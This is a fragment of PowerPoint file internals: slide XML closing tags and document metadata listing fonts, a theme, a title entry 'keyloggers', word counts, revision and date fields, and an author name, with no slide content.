            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18789168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48</TotalTime>
  <Words>1020</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>107</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__Inter_aaf875</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Franklin Gothic Demi</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>ui-monospace</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>keyloggers</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Abarna S</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-05T11:02:31Z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